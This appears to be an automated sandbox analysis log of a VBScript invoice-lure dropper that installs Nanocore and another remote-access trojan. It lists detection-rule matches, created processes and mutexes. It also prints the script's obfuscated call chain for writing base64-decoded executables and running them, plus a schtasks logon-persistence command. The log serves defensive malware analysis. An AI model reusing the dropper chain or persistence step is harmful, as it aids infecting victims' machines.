            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: dhcpmon.exe.4.dr Static PE information: Section: .rsrc ZLIB complexity 0.999787946429
            Source: dhcpmon.exe.4.dr, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
            Source: dhcpmon.exe.4.dr, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.0.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 4.0.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 4.2.fi.exe.40000.0.unpack, #=qVxXNKnhAcArgJoGGYXiyyQ==.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: dhcpmon.exe.4.dr, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: dhcpmon.exe.4.dr, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.2.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 3.0.ame.exe.500000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.0.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.0.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleBotKiller.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 4.2.fi.exe.40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@14/9@20/3
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410DA AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Code function: 4_2_023410A3 AdjustTokenPrivileges,
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File created: C:\Program Files (x86)\DHCP Monitor
            Source: C:\Users\user\AppData\Local\Temp\ame.exe File created: C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Mutant created: \Sessions\1\BaseNamedObjects\871-085a33d91457
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{ac555290-50d4-4120-9390-e76e4f948dd7}
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\ame.exe
            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\AppData\Local\Temp\fi.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Notepads.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Roaming\Notepads.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Invoice No F1019855_PDF.vbs Virustotal: Detection: 29%
            Source: Invoice No F1019855_PDF.vbs ReversingLabs: Detection: 23%
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe'
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe'
            Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
            Source: C:\Users\user\AppData\Local\Temp\ame.exe Process created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe'
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\Users\user\AppData\Roaming\Notepads.exe C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Users\user\AppData\Local\Temp\fi.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")
            .NET source code contains potential unpacker
            Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs | .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs | .Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr | Static PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E5BA1 push E87220CAh; ret
            Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
